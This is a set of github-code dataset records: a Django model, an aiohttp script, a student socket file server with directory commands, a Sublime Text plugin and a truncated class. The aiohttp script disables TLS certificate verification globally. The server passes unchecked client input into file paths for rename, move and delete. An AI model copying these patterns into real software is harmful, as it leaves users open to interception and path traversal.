Task(models.Model):\n pipeline = models.ForeignKey(Pipeline, on_delete=models.CASCADE, related_name='task')\n tasktpl = models.ForeignKey(Tasktpl, on_delete=models.CASCADE, related_name='task')\n params = JSONField()\n stage = models.IntegerField(default=1)\n seq = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n db_table = 't_task'\n", "repo_name": "cipher-ops/backend-kts", "sub_path": "kratos/apps/task/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.Model", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 8, "usage_type": "call"}, {"api_name": "kratos.apps.pipeline.models.Pipeline", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 9, "usage_type": "call"}, {"api_name": "kratos.apps.tasktpl.models.Tasktpl", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django_mysql.models.JSONField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "74992256165", "text": "import aiohttp\nimport asyncio\nimport logging\nfrom typing import (\n Dict,\n Optional,\n)\n\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\nclass Genv():\n COIN_CAP_BASE_URL = \"https://api.coincap.io/v2\"\n _shared_client=None\n async def _http_client(self) -> aiohttp.ClientSession:\n if self._shared_client is None:\n self._shared_client = aiohttp.ClientSession()\n return self._shared_client\n\n async def fetch_prices(self):\n try:\n client = await self._http_client()\n async with client.request(\"GET\", \"https://baidu.com\") as resp:\n rates_dict = await resp.json()\n print(rates_dict)\n for rate_obj in rates_dict[\"data\"]:\n symbol = rate_obj[\"symbol\"].upper()\n print(symbol)\n except Exception:\n raise\nasync def main():\n a=Genv()\n await a.fetch_prices()\nif __name__ == \"__main__\":\n ev_loop: asyncio.AbstractEventLoop = asyncio.get_event_loop()\n ev_loop.run_until_complete(main())", "repo_name": "koinotice/levenbot", "sub_path": "python/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 1162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 10, "usage_type": "attribute"}, {"api_name": "ssl._create_default_https_context", "line_number": 12, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 12, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 18, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 16, "usage_type": "attribute"}, {"api_name": "asyncio.AbstractEventLoop", "line_number": 36, "usage_type": "attribute"}, {"api_name": "asyncio.get_event_loop", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "35090082802", "text": "#Patel, Meetkumar\r\n#UTA ID: 1001750000\r\n\r\n#getting all required libraries\r\nimport socket\r\nimport tkinter\r\nfrom socket import AF_INET, socket, SOCK_STREAM\r\nfrom threading import Thread\r\nfrom tkinter import *\r\nfrom threading import *\r\nimport os \r\nimport sys\r\nimport pickle\r\nfrom pathlib import Path\r\nimport json\r\nimport shutil\r\nfrom dirsync import sync\r\nimport distutils.dist\r\nfrom distutils.core import setup\r\n\r\n#setting default Path for directory's CRUD operations\r\nPATH = \"C:\\\\Users\\\\patel\\\\Desktop\\\\DS\"\r\nclient_path = \"C:\\\\Users\\\\patel\\\\Desktop\\\\DS_clients\"\r\nidentifiers = ['A','B','C']\r\nidentifier_count = 0\r\nclient_bind_identifier = {} #keeps track of which client has which identifier\r\nallocated_dirs = {} #keeps track of which identifier has which directories\r\ntry: \r\n for i in range(len(identifiers)):\r\n allocated_dirs[identifiers[i]] = os.listdir(os.path.join(client_path,identifiers[i]))\r\nexcept:\r\n for i in range(len(identifiers)):\r\n allocated_dirs[identifiers[i]] = os.mkdir(os.path.join(client_path,identifiers[i]))\r\n \r\n\r\n#all os directory operations were referred from this: https://docs.python.org/3/library/os.html\r\n\r\n# Pathname manipulations: https://docs.python.org/2/library/os.path.html\r\n\r\n#this function will handle all incoming clients by providing them different threads and printing appropriate message for their connection\r\ndef incoming_client_connections():\r\n while True:\r\n #server socket accepts all incoming client requests nd stores client's address and metadata\r\n client, client_address = SERVER.accept()\r\n print(\"\\n%s:{} has connected with address: \".format(client_address)) #prints that client address\r\n client.send(bytes(\"\\nWelcome! Enter your username and press enter... OR Type (quit) to exit!\", FORMAT)) #Welcome message at client window after first client enters the name\r\n addresses[client] = client_address # client address is stored in addresses array\r\n Thread(target=handle_client, args=(client,)).start() # starts a new thread\r\n\r\n# extra function I wrote by mistake \r\ndef sync_dirs(current_client,current_identifier,no_of_dirs_temp):\r\n no_of_dirs = no_of_dirs_temp\r\n \r\n for i in range(len(no_of_dirs)):\r\n #https://www.geeksforgeeks.org/python-os-path-join-method/\r\n src = os.path.join(PATH,no_of_dirs[i])\r\n dest = os.path.join(os.path.join(client_path,current_identifier),no_of_dirs[i])\r\n sync(src,dest,'sync')\r\n\r\ndef handle_client(client): # Takes client socket as argument. then redirect to commands as per input \r\n global identifier_count, client_bind_identifier,client_path,allocated_dirs\r\n while True:\r\n #https://pythonpedia.com/en/tutorial/8710/sockets-and-message-encryption-decryption-between-client-and-server\r\n name = client.recv(buffer_size).decode(FORMAT) #decoding incoming request strings \r\n if name == \"quit\": #if message is quit, client will be disonnected \r\n current_client = clients[client]\r\n #https://www.geeksforgeeks.org/python-get-key-from-value-in-dictionary/\r\n clients.pop(list(clients.keys())[list(clients.values()).index(current_client)]) #removing client from active_clients \r\n message_list_box.insert(tkinter.END,\"\\nClient {} got offline...\".format(current_client))\r\n\r\n elif ',' in name: #handle file operations\r\n command = name.split(',')[0] #https://www.w3schools.com/python/ref_string_split.asp\r\n if (command == \"create\"):\r\n dir_name = name.split(',')[1]\r\n new_path = os.path.join(PATH,clients[client])\r\n if dir_name in os.listdir(new_path): #https://www.tutorialspoint.com/python/os_listdir.htm\r\n client.send(bytes(\"Directory with same name already exists\",FORMAT))\r\n else:\r\n try: \r\n os.mkdir(os.path.join(new_path,dir_name))\r\n msg = \"Directory {} created...\".format(dir_name)\r\n client.send(bytes(msg,FORMAT))\r\n except:\r\n client.send(bytes(\"Path does not exists\",FORMAT))\r\n\r\n elif command == \"home\":\r\n path = os.path.join(PATH,clients[client])\r\n all_dirs = str(os.listdir(path))\r\n client.send(bytes(all_dirs,FORMAT))\r\n\r\n elif command == \"delete\":\r\n new_path = os.path.join(PATH,clients[client])\r\n dir_name = name.split(',')[1]\r\n check = os.path.exists(os.path.join(new_path,dir_name))\r\n if check == False: #directory does not exists\r\n client.send(bytes(\"Directory with entered name does not exists... Try again...\",FORMAT))\r\n else: #directory exists\r\n try:\r\n os.rmdir(os.path.join(new_path,dir_name))\r\n client.send(bytes(\"Directory {} deleted...\".format(dir_name),FORMAT))\r\n except:\r\n client.send(bytes(\"Directory contains subdirectories...\",FORMAT))\r\n\r\n elif command == \"rename\":\r\n dir_names = name.split(',')[1]\r\n old_name = dir_names.split('-')[0]\r\n new_name = dir_names.split('-')[1]\r\n client_path = os.path.join(PATH,clients[client])\r\n old_path = os.path.join(os.path.join(PATH,clients[client]),old_name)\r\n new_path = os.path.join(os.path.join(PATH,clients[client]),new_name)\r\n if os.path.dirname(old_path) != os.path.dirname(new_path):\r\n client.send(bytes(\"Directory must follow the same path... Try again\",FORMAT))\r\n\r\n elif (os.path.dirname(old_path)!=os.path.dirname(new_path)) and (os.path.normpath(os.path.commonprefix([old_path,new_path]))!= client_path): #https://www.geeksforgeeks.org/python-os-path-commonprefix-method/\r\n #https://www.geeksforgeeks.org/python-os-path-normpath-method/\r\n client.send(bytes(\"You can not rename another client's directory\",FORMAT))\r\n\r\n else:\r\n try: \r\n os.rename(old_path,new_path)\r\n client.send(bytes(\"Directory renamed successfully...\",FORMAT))\r\n except:\r\n client.send(bytes(\"Requested path or directory does not exists. Try again\",FORMAT))\r\n \r\n elif command == \"move\":\r\n dir_names = name.split(',')[1]\r\n client_path = os.path.join(PATH,clients[client])\r\n os.chdir(client_path)\r\n old_path = os.path.join(client_path,dir_names.split('-')[0])\r\n new_path = os.path.join(client_path,dir_names.split('-')[1])\r\n # print(old_path)\r\n # print(new_path)\r\n # print(os.path.commonprefix([old_path,new_path]))\r\n # print(Path(os.path.commonprefix([old_path,new_path])))\r\n if os.path.dirname(old_path) == os.path.dirname(new_path):\r\n client.send(bytes(\"Directory must follow some different path...We can't move directory to same folder(path) Try again\",FORMAT))\r\n \r\n elif os.path.normpath(os.path.commonprefix([old_path,new_path]))== PATH:\r\n client.send(bytes(\"You can not move your directory to other client\",FORMAT))\r\n else:\r\n try: \r\n shutil.move(old_path,new_path) #https://www.geeksforgeeks.org/python-shutil-move-method/\r\n client.send(bytes(\"Directory moved successfully...\",FORMAT))\r\n except:\r\n client.send(bytes(\"Requested path or directory does not exists. Try again\",FORMAT))\r\n\r\n elif command == \"listall\":\r\n all_dirs = str(listalldirectories(clients[client]))\r\n client.send(bytes(all_dirs,FORMAT))\r\n\r\n elif command == \"getpath\":\r\n path = str(getpathalldirs(clients[client]))\r\n client.send(bytes(path,FORMAT))\r\n\r\n elif command == \"copydirs\":\r\n no_of_dirs = (name.split(',')[1]).split('-')\r\n if set(no_of_dirs).issubset(set(os.listdir(PATH))): #https://www.w3schools.com/python/ref_set_issubset.asp\r\n # try:\r\n current_client = clients[client]\r\n # print(client_bind_identifier)\r\n current_identifier = list(client_bind_identifier.keys())[list(client_bind_identifier.values()).index(current_client)]\r\n allocated_dirs[current_identifier] = no_of_dirs\r\n for i in range(len(no_of_dirs)):\r\n\r\n # os.mkdir(os.path.join(client_path,current_identifier)) #requested client's copy will be made at client side\r\n src = os.path.join(PATH,no_of_dirs[i]) #set source path as requested clients' folders\r\n # print(src)\r\n dest = os.path.join(os.path.join(client_path,current_identifier),no_of_dirs[i]) #set destination path as local path -> identifier -> given name\r\n # print(dest)\r\n # shutil.copytree(src,dest)\r\n distutils.dir_util.copy_tree(src, dest) #copying files from server to local directory\r\n #https://stackoverflow.com/questions/1511808/python-distutils-copy-tree-with-filter\r\n\r\n client.send(bytes(\"Files have been copied to local storage successfully ...\",FORMAT))\r\n\r\n # except:\r\n # sync(current_client,current_identifier)\r\n # client.send(\"Files have been synchronized successfully...\",FORMAT)\r\n else:\r\n client.send(bytes(\"Some files are not presented on server, check and try again\",FORMAT))\r\n\r\n elif command == \"sync\":\r\n current_client = clients[client]\r\n # print(\"current_client\",current_client)\r\n current_identifier = list(client_bind_identifier.keys())[list(client_bind_identifier.values()).index(current_client)]\r\n # print(current_client)\r\n # print(\"allocated\",allocated_dirs)\r\n # print(\"current id\",current_identifier)\r\n no_of_dirs_temp = allocated_dirs[current_identifier]\r\n # print(\"a\",current_identifier)\r\n # print(\"b\",allocated_dirs)\r\n # print(\"c\",no_of_dirs_temp)\r\n for i in range(len(no_of_dirs_temp)):\r\n src = os.path.join(PATH,no_of_dirs_temp[i])\r\n dest = os.path.join(os.path.join(client_path,current_identifier),no_of_dirs_temp[i])\r\n # print(src)\r\n # print(dest)\r\n #https://www.instructables.com/Syncing-Folders-With-Python/\r\n #https://stackoverflow.com/questions/54688687/how-to-synchronize-two-folders-using-python-script\r\n sync(src,dest,'sync',purge=True)\r\n\r\n elif command ==\"desync\":\r\n current_client = clients[client]\r\n current_identifier = list(client_bind_identifier.keys())[list(client_bind_identifier.values()).index(current_client)]\r\n # https://stackoverflow.com/questions/13118029/deleting-folders-in-python-recursively'\r\n no_of_dirs_temp = allocated_dirs[current_identifier]\r\n # print(\"new\",no_of_dirs_temp)\r\n for i in range(len(no_of_dirs_temp)):\r\n shutil.rmtree(os.path.join(os.path.join(client_path,current_identifier),no_of_dirs_temp[i]))\r\n\r\n client.send(bytes(\"Your local directories are successfully desynchronized...\",FORMAT))\r\n\r\n else: #new client\r\n #check username characters \r\n if not name.isalpha(): #https://www.w3schools.com/python/ref_string_isalpha.asp\r\n client.send(bytes(\"Enter valid username ! Illegar characters are not allowed\",FORMAT))\r\n active_clients()\r\n\r\n elif name in clients.values():\r\n client.send(bytes(\"Client already there\",FORMAT))\r\n active_clients()\r\n\r\n else:\r\n #check whether given path exists or not\r\n # if given user name is present in system, log in the client and give access to directories\r\n check = os.path.exists(os.path.join(PATH,name))\r\n if check == True: # if client is already in system, he will be logged in and continue his operaions\r\n msg = \"\\n\\n%s has logged in again with HOST ADDRESS: %s and PORT-NUMBER: %s\"%(name,HOST,PORT)\r\n client.send(bytes(\"\\nWelcome to server again...\",FORMAT))\r\n message_list_box.insert(tkinter.END,msg)\r\n \r\n id = identifiers[identifier_count]\r\n # print(\"idd client\",id)\r\n client.send(bytes(\"\\nYour new Identifier is...\",FORMAT))\r\n clients[client] = name\r\n active_clients()\r\n client.send(bytes(id,FORMAT))\r\n active_clients()\r\n # client.send(bytes(\"Available local directories\",FORMAT))\r\n client_bind_identifier[identifiers[identifier_count]] = name\r\n message_list_box.insert(tkinter.END,\"Clients registered with identifiers...\")\r\n message_list_box.insert(tkinter.END,client_bind_identifier)\r\n client.send(bytes(\"Available home directories on server\",FORMAT)) \r\n try:\r\n #creating local copy of client's identifier\r\n os.mkdir(os.path.join(client_path,identifiers[identifier_count]))\r\n identifier_count = identifier_count + 1\r\n except:\r\n # message_list_box.insert(tkinter.END,\"Client has Local copy alredy exists..\")\r\n identifier_count = identifier_count + 1\r\n\r\n else: #client will be registered as new one \r\n clients[client] = name\r\n # print(\"idddd\",identifier_count)\r\n client.send(bytes(\"\\nWelcome to server!\",FORMAT))\r\n msg = \"\\n%s has joined with HOST ADDRESS:%s and PORT-NUMBER:%s\" % (name, HOST, PORT)\r\n message_list_box.insert(tkinter.END,msg)\r\n os.mkdir(os.path.join(PATH,name))\r\n\r\n id = identifiers[identifier_count]\r\n # print(\"idd client\",id)\r\n client.send(bytes(\"\\nYour new Identifier is...\",FORMAT))\r\n active_clients()\r\n client.send(bytes(id,FORMAT))\r\n\r\n \r\n client_bind_identifier[identifiers[identifier_count]] = name #https://stackoverflow.com/questions/20145154/dictinary-of-dictionary-in-python?rq=1\r\n message_list_box.insert(tkinter.END,\"Clients registered with identifiers...\")\r\n message_list_box.insert(tkinter.END,client_bind_identifier)\r\n client.send(bytes(\"Available home directories on server\",FORMAT))\r\n try:\r\n #creating local copy of client's identifier\r\n os.mkdir(os.path.join(client_path,identifiers[identifier_count]))\r\n identifier_count = identifier_count + 1\r\n except:\r\n # message_list_box.insert(tkinter.END,\"Client has Local copy alredy exists..\")\r\n identifier_count = identifier_count + 1\r\n\r\n\r\n\r\ndef getpathalldirs(client): #returns list of path to all directories for current client\r\n paths = []\r\n new_path = os.path.join(PATH,client)\r\n #https://stackoverflow.com/questions/16953842/using-os-walk-to-recursively-traverse-directories-in-python\r\n for path, subdirs, files in os.walk(new_path):\r\n for name in subdirs:\r\n paths.append(os.path.join(path,name))\r\n\r\n return paths\r\n\r\ndef listalldirectories(client): #returns all directories at given path\r\n dirs = []\r\n #https://stackoverflow.com/questions/16953842/using-os-walk-to-recursively-traverse-directories-in-python\r\n for a, subdirs, files in os.walk(os.path.join(PATH,client)):\r\n for name in subdirs:\r\n dirs.append(name)\r\n return dirs\r\n\r\ndef present_clients(): #function used to print all active + inactive clients on server side \r\n dirs = []\r\n for i in os.listdir(PATH):\r\n dirs.append(i)\r\n msg = list(dirs)\r\n message_list_box.insert(tkinter.END,\"All clients present in system: (Active and inactive both)\\n\\n\",msg,\"\\n\")\r\n\r\ndef active_clients(): #function used to print all active clients right now at server \r\n display_window =list(clients.values())\r\n message_list_box.insert(tkinter.END, \"\\n\\n---------Currently active clients:---------\\n\\n\",display_window,\"\\n\")\r\n\r\n# def disconnect_client(client):\r\n # handle_client()\r\ndef desync(): #desynchronizes directory and deletes the local directories\r\n print(allocated_dirs)\r\n for i in range(len(identifiers)):\r\n id = identifiers[i]\r\n no_of_dirs_temp = allocated_dirs[id]\r\n for j in range(len(no_of_dirs_temp)):\r\n shutil.rmtree(os.path.join(os.path.join(client_path,id),no_of_dirs_temp[j])) \r\n\r\ndef on_quit(root): #to close down server \r\n SERVER.shutdown(socket.SHUT_RDWR)\r\n SERVER.close()\r\n root.quit()\r\n \r\n\r\n# how threads are created in while loop for all clietns, I took from this site\r\n#https://medium.com/swlh/lets-write-a-chat-app-in-python-f6783a9ac170\r\n\r\n# how to use tkinter, I saw from this site and youtube video \r\n#https://realpython.com/python-gui-tkinter/\r\n#https://www.youtube.com/watch?v=YXPyB4XeYLA&ab_channel=freeCodeCamp.org\r\n\r\nif __name__ == \"__main__\": #main code\r\n root = tkinter.Tk() #initialize window manager \r\n root.title(\"Server window\") #title of server window\r\n msg_frame = tkinter.Frame(root)\r\n scroll_nav = tkinter.Scrollbar(msg_frame)\r\n \r\n message_list_box = tkinter.Listbox(msg_frame, height=23, width=75, yscrollcommand=scroll_nav.set)\r\n scroll_nav.pack(side=tkinter.RIGHT, fill=tkinter.Y)\r\n message_list_box.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\r\n\r\n message_list_box.insert(tkinter.END, \"Waiting for clients to connect:\")\r\n message_list_box.see(tkinter.END)\r\n\r\n message_list_box.pack()\r\n msg_frame.pack()\r\n root.protocol(\"DELETE_WINDOW\", on_quit)\r\n\r\n send_button = tkinter.Button(root, text=\"Active Clients\",width= 15, command=active_clients) #button show which clients are active right now \r\n send_button.pack() \r\n send_button = tkinter.Button(root, text=\"Present Clients(Active and inactive both)\",width= 30, command=present_clients) #button shows which clients are presented on server. they could be active or inactive\r\n send_button.pack() \r\n send_button = tkinter.Button(root, text=\"Desynchronize all clients: \",width= 30, command=desync) #this will delete all local directories withour permission of clients\r\n send_button.pack() \r\n\r\n\r\n clients = {} #client's dictionary. maintains, clients' information: client's address and his name\r\n addresses = {} #i created this dictionary to store addresses but never used it further \r\n\r\n HOST = \"127.0.0.1\"\r\n PORT = 3000\r\n FORMAT = \"utf-8\"\r\n buffer_size = 1024\r\n ADDR = (HOST, PORT)\r\n\r\n SERVER = socket(AF_INET, SOCK_STREAM)\r\n SERVER.bind(ADDR) #bind server with his address\r\n\r\n SERVER.listen(3)#can concurrently run 3 clients\r\n ACCEPT_THREAD = Thread(target=incoming_client_connections)\r\n ACCEPT_THREAD.start() #starting thread \r\n tkinter.mainloop() #starts GUI \r\n ACCEPT_THREAD.join()\r\n SERVER.close()\r\n\r\n", "repo_name": "Meet1809/Distributed-Systems", "sub_path": "Lab 2/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 20113, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "dirsync.sync", "line_number": 58, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.commonprefix", "line_number": 114, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 138, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 142, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "distutils.dist.dir_util.copy_tree", "line_number": 171, "usage_type": "call"}, {"api_name": "distutils.dist.dir_util", "line_number": 171, "usage_type": "attribute"}, {"api_name": "distutils.dist", "line_number": 171, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "dirsync.sync", "line_number": 200, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 226, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 230, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 241, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 257, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 268, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 273, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 273, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path", "line_number": 283, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 285, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 301, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 304, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 308, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "socket.socket.SHUT_RDWR", "line_number": 321, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 321, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 334, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 336, "usage_type": "call"}, {"api_name": "tkinter.Scrollbar", "line_number": 337, "usage_type": "call"}, {"api_name": "tkinter.Listbox", "line_number": 339, "usage_type": "call"}, {"api_name": "tkinter.RIGHT", "line_number": 340, "usage_type": "attribute"}, {"api_name": "tkinter.Y", "line_number": 340, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 341, "usage_type": "attribute"}, {"api_name": "tkinter.BOTH", "line_number": 341, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 343, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 344, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 350, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 352, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 354, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 367, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 367, "usage_type": "argument"}, {"api_name": "socket.SOCK_STREAM", "line_number": 367, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 371, "usage_type": "call"}, {"api_name": "tkinter.mainloop", "line_number": 373, "usage_type": "call"}]} +{"seq_id": "21224144418", "text": "import sublime\nimport sublime_plugin\nimport re\nfrom subprocess import check_output\nimport json\nimport os\n\nclass LaravelTransCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n folder = self.view.window().extract_variables()['folder']\n path = folder + \"/resources/lang/en/\"\n filelist = os.listdir(path)\n transfiles = list(map(lambda l: l.split('.')[0], filelist))\n print(transfiles)\n for region in self.view.sel():\n if region.empty():\n line = self.view.line(region)\n content = self.view.substr(line)\n trans = re.search('trans\\(\\'([a-zA-Z.-]*)\\'\\)', content)\n end = line.end()\n if trans:\n parts = trans.group(1).split('.')\n print(parts)\n file = parts[0]\n total = path + file + '.php'\n print(total)\n config = check_output(['php', '-r', 'echo json_encode(include \"' + total + '\");'])\n config = json.loads(config.decode(\"utf-8\"))\n print(config.keys())\n # self.view.window().open_file(total)", "repo_name": "koerel/sublime-plugins", "sub_path": "laravel-trans-helper.py", "file_name": "laravel-trans-helper.py", "file_ext": "py", "file_size_in_byte": 1195, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sublime_plugin.TextCommand", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "re.search", "line_number": 19, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 27, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "14766366149", "text": "import json\n\nfrom verbs.activities import Activities\n\nfrom counties.county import County\n\n\nclass CountyManager():\n def __init__(self):\n self.counties = {}\n self.selected_county = \"\"\n with open ( \"data/counties.json\" ) as f:\n data = json.load(f)\n for c in data[\"counties\"]:\n county = County()\n county.name = 